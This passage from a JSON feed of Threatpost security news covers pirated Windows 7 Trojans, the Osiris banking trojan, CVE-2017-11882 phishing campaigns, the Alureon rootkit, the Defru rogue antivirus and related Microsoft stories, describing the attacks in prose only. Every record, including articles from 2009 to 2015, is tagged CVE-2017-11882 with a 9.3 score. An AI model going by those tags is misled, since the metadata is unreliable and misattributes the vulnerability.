9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. [Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:18", "description": "After staying dormant for few years, the Kronos banking trojan resurfaced in July in a form dubbed Osiris. A wider analysis of how the banking trojan is evolving shows innovative development on the part of its authors, with an eye to broader malware trends.\n\nOsiris [first appeared in July](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>) in three distinct campaigns targeting Germany, Japan and Poland over the summer. It was clear that it\u2019s based off of the [Kronos malware](<https://threatpost.com/new-kronos-banking-malware-advertised-on-russian-forums/107210/>) which led the financial crime pack for many quarters after it surfaced in 2014 (it is itself a descendant of the infamous [Zeus banking code](<https://threatpost.com/versatility-of-zeus-framework-encourages-criminal-innovation/106638/>)).\n\nWhile the behaviors exhibited by the newly spawned banking trojan are similar to many other prevalent banking malware (for instance, it implements Zeus-style G/P/L web-injects, a keylogger and a VNC server, according to Securonix researcher Oleg Kolesnikov), there are also significant differences.\n\nFor one, it uses encrypted Tor traffic for command-and-control (C2). \u201cThe malicious payload spawns multiple processes named \u2018tor.exe\u2019 and connects to multiple distinct host (Tor nodes) located in different countries,\u201d Kolesnikov said in [a post](<https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack>) Tuesday on Osiris.\n\nAlso, Osiris has upped the game on evasion efforts. As Kolesnikov explained in an interview with Threatpost, \u201cOne of the new aspects of Osiris that are particularly notable is a fairly innovative legitimate process impersonation technique.\u201d He added that this evasion technique involves a combination of a recently pioneered [process-doppelganging approach](<https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf>), combined with the more traditional [process-hollowing](<https://threatpost.com/mylobot-botnet-emerges-with-rare-level-of-complexity/132967/>) technique.\n\n\u201cThis can potentially make detection of the banking trojan\u2019s activity using purely endpoint tools more challenging compared to tools that are capable of looking at the behaviors of other entities besides endpoints\u2026[such as] network and user information,\u201d he said.\n\n**The Attack Pattern**\n\nThe primary infiltration vector that has so far been [seen in the wild](<https://research.checkpoint.com/osiris-enhanced-banking-trojan>) for Osiris is spam email. These contain specially crafted Microsoft Word documents/RTF attachments with macro/OLE content that cause malicious obfuscated VB stages to be dropped and executed. In many scenarios, the malware is distributed using exploit kits like RIG EK, the analysis showed.\n\nThe malicious document exploits a well-known buffer overflow vulnerability in Microsoft Office Equation Editor Component ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)) which allows the attacker to perform arbitrary code-execution.\n\n\u201cThe vulnerability resides in the Equation Editor Component which, when used, runs as its own process (eqnedt32.exe),\u201d Kolesnikov explained. \u201cBecause of the way it was implemented, it doesn\u2019t support Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). A malicious document exploits the vulnerability to execute a command to download the latest version of [Osiris].\u201d\n\nOsiris, like other banking trojans, is mainly aimed at stealing credentials and other sensitive data, from online banking accounts and so on. The primary method of collection is through a man-in-browser attack to web-inject malicious script into banking websites and grabbing form values.\n\n**A Thoroughly Modern Malware**\n\nNotably, Osiris\u2019 fundamental makeup positions it in the fore of malware trends, despite being based on old source code that\u2019s been knocking around for years.\n\n\u201cBased on the banking attacks we are seeing in the wild, there appears to be a growing trend towards a convergence of malicious features offered by many trojans,\u201d Kolesnikov told Threatpost. \u201cFor instance, it is quite common to see the same baseline set of features offered in many prevalent bank trojans, such as form-grabbing, sandbox and AV bypass, web injections, password recovery, keylogging and remote access.\u201d\n\nHe added that the latest version of Osiris also fits into a trend of malware adopting [a more modular architecture](<https://threatpost.com/bad-actors-sizing-up-systems-via-lightweight-recon-malware/137364/>) in general; this enables malicious actors to provide updates and plugins to implement various malicious behaviors after an initial infection.\n\nThis dovetails with \u201ca growing trend for more rapid malware prototyping and a decrease in the \u2018research-to-malware\u2019 time it for malicious threat actors to implement the latest attack and evasion techniques reported in the security community,\u201d he added.\n\nUnfortunately, Osiris is poised to become more widespread, given that its pricing on the Dark Web lowers the barrier-to-entry for bad actors.\n\n\u201cAnother aspect is that Osiris is relatively cheaper compared to Kronos, which was sold for $3,000 in 2014, compared to Osiris that is sold for $2,000 in 2018, making it potentially more accessible to more cybercriminals,\u201d Kolesnikov told us. \u201cAlso, Osiris authors offered an option of reselling the license for $1,000 (not offered for Kronos), which can potentially further increase the scale and impact of the malicious threat.\u201d\n", "cvss3": {}, "published": "2018-09-12T16:12:55", "type": "threatpost", "title": "Osiris Banking Trojan Displays Modern Malware Innovation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-09-12T16:12:55", "id": "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "href": "https://threatpost.com/osiris-banking-trojan-displays-modern-malware-innovation/137393/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:45:33", "description": "Microsoft is warning of a fresh email campaign that distributes malicious RTF files boobytrapped with an exploit dating back to a 2017 vulnerability, [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>).\n\nThe exploit allows attackers to automatically run malicious code without requiring user interaction.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks,\u201d Microsoft Security Intelligence tweeted on Friday. \u201cNotably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.\u201d\n\n> An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction. [pic.twitter.com/Ac6dYG9vvw](<https://t.co/Ac6dYG9vvw>)\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [June 7, 2019](<https://twitter.com/MsftSecIntel/status/1137118977983897600?ref_src=twsrc%5Etfw>)\n\nThe flaw is a stack-based overflow bug in Microsoft Equation Editor.\n\n\u201cThe security flaw affected all versions of Microsoft Office, Microsoft Windows and architecture types dating back to 2000,\u201d Tripwire explained in [a write-up](<https://www.tripwire.com/state-of-security/latest-security-news/microsoft-warns-of-malspam-campaign-abusing-office-vulnerability-to-distribute-backdoor/>), posted Monday. \u201cThe security weakness enables a bad actor to execute arbitrary code on a vulnerable machine. In [an] analysis, for instance, researchers found a digital attacker could easily launch a file from the WebDAV server under their control as well as use an OLE auto-update to exploit the flaw without any user interaction.\u201d\n\nIn this current wave of attacks targets receive an email in one of several European languages. If the recipient falls for the lure and clicks on the RTF file, it downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) which in turn download a backdoor payload. The backdoor payload then tries to connect to command-and-control server (which was down at the time of Microsoft Security Intelligence\u2019s warning).\n\nThe same bug was at the heart of a campaign in late 2018 and early 2019 that distributed the most recent version of the .Hawkeye keylogger. Emails arrived with malicious Microsoft Excel, RTF and Doc attachments loaded with an exploit for the arbitrary code-execution bug.\n\nOnce a victim clicked on the attachment, the email-senders have intentionally made the contents of the documents look blurry \u2014 and the user was prompted to enable editing to have a clearer view of the contents. After they did that, the injection process began, with the HawkEye keylogger being downloaded. The malware then snatched up sensitive information, such as the system information, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nCybercriminals using older bugs is a clear indicator that better patching habits in order: \u201cThe fact that digital attacks continue to leverage exploit code for old vulnerabilities like CVE-2017-11882 highlights [the need for organizations to keep their software up-to-date](<https://threatpost.com/threatlist-financial-services-firms-lag-in-patching-habits/134750/>) by investing in their vulnerability management capabilities,\u201d noted Tripwire.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-10T16:10:04", "type": "threatpost", "title": "Microsoft Warns of Email Attacks Executing Code Using an Old Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-06-10T16:10:04", "id": "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "href": "https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:04:57", "description": "Dennis Fisher talks with Katie Moussouris of Microsoft about the company\u2019s new [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) for innovative defensive security technology, why Microsoft didn\u2019t start a bug bounty program and whether this will become an annual contest.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-08-24T11:45:50", "type": "threatpost", "title": "Katie Moussouris on the Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T20:01:36", "id": "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "href": "https://threatpost.com/katie-moussouris-microsoft-blue-hat-prize-082411/75575/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:30", "description": "[](<https://threatpost.com/ms10-015-restart-issues-are-result-rootkit-infection-021810/>)Microsoft on Thursday confirmed that the blue screen of death issues that affected a slew of users after the latest batch of Patch Tuesday updates is the result of an existing infection by the Alureon rootkit. \n\nThere was widespread speculation after the patch release that simply installing the MS10-015 update was causing the BSOD condition on some Windows 32-bit machines. However, Microsoft said at the time this was not the case and started an investigation into the problem. In an advisory released Thursday, the company said that it now was confident that the restart problem is being caused by the Alureon rootkit.\n\n\u201cAfter extensive testing, Microsoft has confirmed \nthat the restart issue is a result of Alureon rootkit infections,\u201d Microsoft\u2019s Jerry Bryant, senior security communications manager lead, said in a statement. \n\nAlureon is a sophisticated malware package that comprises a number of components, including a rootkit, search hijacking functionality and the ability to modify DNS settings. One of the changes it makes when it\u2019s installed is a modification to a specific driver. \n\n\u201cFor the most common system configuration (for machines using ATA hard \ndisk drives) , the ATA miniport driver \u2018atapi.sys\u2019 is the file which is \ntargeted. \n \nWhile the concept of modifying Windows system files \nas part of an installation method is not new, it is not a common \napproach. The file modification performed by Alureon overwrites the \ndata in the target driver\u2019s resource section with its own code. The \nentry point of the driver is modified to point to this code. By doing \nso, the malicious code is executed when the driver is loaded by the \noperating system,\u201d Microsoft\u2019s Scott Molenkamp wrote in a [blog post on the MS10-015 issues](<http://blogs.technet.com/mmpc/>). \u201cAs part of the February security updates, an update (MS10-015) \nresolving a vulnerability in Windows Kernel was released. This update \nincluded a new operating system kernel. Inspecting the updated kernel \nat the same VA, we observe that this address no longer corresponds to \nthe start of the \u201cExAllocatePool\u201d API. In \nthe updated kernel, the VA of \u201cExAllocatePool\u201d has changed. Therefore, \nafter applying MS10-015, Alureon will now be attempting to make an \ninvalid call.\u201d\n\nThat results in the BSOD or a system hang. Users affected by this problem can fix it by replacing the infected driver with a new one via the system console. \n", "cvss3": {}, "published": "2010-02-18T18:08:58", "type": "threatpost", "title": "MS10-015 Restart Issues Are the Result of Rootkit Infection", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:26:11", "id": "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "href": "https://threatpost.com/ms10-015-restart-issues-are-result-rootkit-infection-021810/73561/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:30", "description": "Microsoft confirmed this week that one of its recent acquisitions, the gaming firm Mojang, has not been hacked.\n\nNearly 2,000 credentials belonging to users of the [Mojang game](<https://mojang.com/games/>) Minecraft \u2013 email addresses and passwords in plain-text \u2013 surfaced on Pastebin earlier this week and speculation began to run rampant.\n\nGiven the Swedish video gaming service \u2013 which Microsoft purchased in September \u2013 boasts in excess of 50 million members, many feared the company had been hacked.\n\n[Heise Security](<http://www.heise.de/newsticker/meldung/1800-Minecraft-Accounts-kompromittiert-2520192.html>) reported the breach on Monday, and searched through the list and discovered users from Germany were on it and that the information was current. If a user hasn\u2019t set a security question, attackers could potentially log into one user\u2019s account to another.\n\nMicrosoft\u2019s response however suggests it\u2019s just business as usual for Mojang, who like other gaming firms, get hacked from time to time and are forced to reset a small group of users\u2019 passwords.\n\n\u201cWe can confirm that no Mojang.net service was compromised and that normal industry procedures for dealing with situations like this were put in place to reset passwords for the small number of affected accounts,\u201d a Microsoft spokesperson told Stuart Dredge with _The Guardian_ on Wednesday.\n\nWhile Microsoft didn\u2019t explain exactly how the service\u2019s users were compromised, Owen Hill, the company\u2019s Chief Word Officer suggested that a fraction of Mojang\u2019s users may have been phished.\n\n\u201cNo! We haven\u2019t been hacked. A bunch of bad people have tricked some of our users into disclosing their account information,\u201d Hill wrote in a blog entry titled [Let\u2019s Talk About Password Security](<https://mojang.com/2015/01/lets-talk-about-password-security/>) yesterday.\n\nHill claims the company has already emailed the affected users and reset their passwords. To help reinforce security going forward, Hill is encouraging users to reset their passwords, not to use the same password on multiple websites and to avoid giving away account details on sites that aren\u2019t its own.\n\nGamers are routinely targeted by hackers and phishers alike.\n\nEmail addresses, hashed passwords and other information were spilled from the video game developer [Blizzard Entertainment when it was hacked in 2012](<http://threatpost.com/blizzard-sued-over-data-breach-authenticator-sales-111212/77207>) while in 2013 another video game company, [Ubisoft](<http://threatpost.com/ubisoft-urges-password-changes-following-hack/101165>), urged users to create new passwords after hackers were able to exploit a vulnerability to get to one of the company\u2019s databases. Usernames, email addresses and encrypted passwords were leaked in that hack.\n\nLast year, a cache of usernames, email addresses and salted password hashes belonging to players of the popular game [League of Legends](<http://na.leagueoflegends.com/en/news/riot-games/announcements/important-security-update-and-password-reset>) was compromised. The service forced users to change their passwords and had to put two new features, email verification and two-factor authentication, into development to bolster security.\n", "cvss3": {}, "published": "2015-01-22T14:35:45", "type": "threatpost", "title": "Mojang Resets Users' Passwords, Microsoft Insists Not a Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-27T15:10:50", "id": "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "href": "https://threatpost.com/following-credential-leak-microsoft-confirms-mojang-not-hacked/110596/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "[](<https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/>)Microsoft on Friday said that a weakness in Internet Explorer 8 identified by security researcher Ruben Santamarta recently is not an exploitable vulnerability, but rather a \u201ctechnique for bypassing ASLR.\u201d\n\nASLR (Address Space Layout Randomization) is a memory protection that, along with DEP (Data Execution Prevention), Microsoft has added to recent versions of Windows and Internet Explorer in order to prevent some specific memory-based attacks. Security researchers and software security experts have praised the two technologies as being very effective anti-exploit technologies and have said ASLR and DEP together make it much more difficult to take advantage of memory vulnerabilities on Windows machines.\n\nHowever, the two technologies certainly are not a foolproof defense against attacks. Several researchers have demonstrated various techniques for bypassing ASLR and DEP under certain circumstances, although Microsoft has addressed some of those attacks in recent releases of Internet Explorer.\n\nSantamarta, a researcher at Wintercore, a Spanish security company, recently published information on a [flaw he found in mshtml.dll](<https://threatpost.com/flaw-core-ie-8-component-could-enable-remote-attacks-070610/>), the HTML viewer in IE 8. He said in [his advisory](<http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1>) that the problem could be exploited to leak a memory pointer in IE 8, which, when combined with some other data, could allow and attacker to run code on a remote machine.\n\nHowever, Jerry Bryant of Microsoft\u2019s Security Response Center said that the problem is not an exploitable vulnerability.\n\n\u201cThe Internet \nExplorer reverse mode issue targeting mshtml.dll is not an exploitable \nvulnerability. It is a technique to bypass ASLR (Address Space Layout \nRandomization) under certain conditions. ASLR is an important countermeasure introduced to help protect \ncustomers from memory-targeting attacks that are commonly seen in the wild. The \nmitigation is most effectively deployed in tandem with DEP (Data Execution \nPrevention),\u201d he said. \u201cThese two mitigations, though not capable of blocking \nall attacks, are highly effective when used in combination with one another.\u201d \n", "cvss3": {}, "published": "2010-07-09T18:34:43", "type": "threatpost", "title": "Microsoft Says IE8 Weakness Not an Exploitable Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:26:00", "id": "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "href": "https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/74195/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL solider from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:54", "description": "[](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>)Microsoft has released the emergency out-of-band patch for the [ASP.NET padding oracle attack](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>), less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina. \n\nThe patch for the ASP.NET bug is only available through [Microsoft\u2019s Download Center](<https://www.microsoft.com/downloads/en/default.aspx?pf=true>) right now, but the company plans to push it out over Windows Update and Windows Server Update within a few days, as well. \n\n\u201cFor customers who use Automatic Updates, the update will be \nautomatically applied once it is released broadly. Once the Security \nUpdate is applied, customers are protected against known attacks related \nto Security Advisory 2416728,\u201d said Dave Forstrom, director of Trustworthy Computing at Microsoft. \n\nThe company will hold a [live webcast](<https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032464130&EventCategory=4&culture=en-US&CountryCode=US>) at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release. \n\nThe ASP.NET vulnerability first game to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, [discussed the bug and their technique for exploiting it](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>). The attack itself is an implementation of an existing technique developed several years ago to exploit weaknesses in crypto implementations.\n\n\u201cWe knew ASP.NET was vulnerable to our attack several months ago, but we \ndidn\u2019t know how serious it is until a couple of weeks ago. It turns out \nthat the vulnerability in ASP.NET is the most critical amongst other \nframeworks. In short, it totally destroys ASP.NET security,\u201d said Duong, when discussing the attack. \u201cIt\u2019s worth noting that the attack is 100% reliable, i.e. one can be \nsure that once they run the attack, they can exploit the target. It\u2019s \njust a matter of time. If the attacker is lucky, then he can own any \nASP.NET website in seconds. The average time for the attack to complete \nis 30 minutes. The longest time it ever takes is less than 50 minutes.\u201d\n\nLast week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don\u2019t protect against the attack, just one version of it.\n\nMicrosoft didn\u2019t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an [out-of-band patch](<https://threatpost.com/attacks-escalate-microsoft-ships-emergency-windows-patch-080210/>) for the original bug that was identified as part of the Stuxnet malware attack. \n", "cvss3": {}, "published": "2010-09-28T18:12:43", "type": "threatpost", "title": "Microsoft Pushes Emergency Patch For ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:24:17", "id": "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "href": "https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/74525/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suit that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This months patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from[ October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and effects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:59", "description": "In this video, Tim Armstrong, a malware researcher at Kaspersky Lab talks with Ryan Naraine about the strengths and weaknesses of the Android operating system. Armstrong looks at strengths and weaknesses of the open-source platform and warns about the risks associated with jailbreaking/rooting Android devices.\n", "cvss3": {}, "published": "2011-03-15T12:34:48", "type": "threatpost", "title": "The Security of the Android Operating System", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:57", "id": "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "href": "https://threatpost.com/security-android-operating-system-031511/75027/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by once such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.&lt;removed&gt; IP 82.146.&lt;removed&gt;.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_&lt;4chars&gt;.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. \u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_&lt;4chars&gt;\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 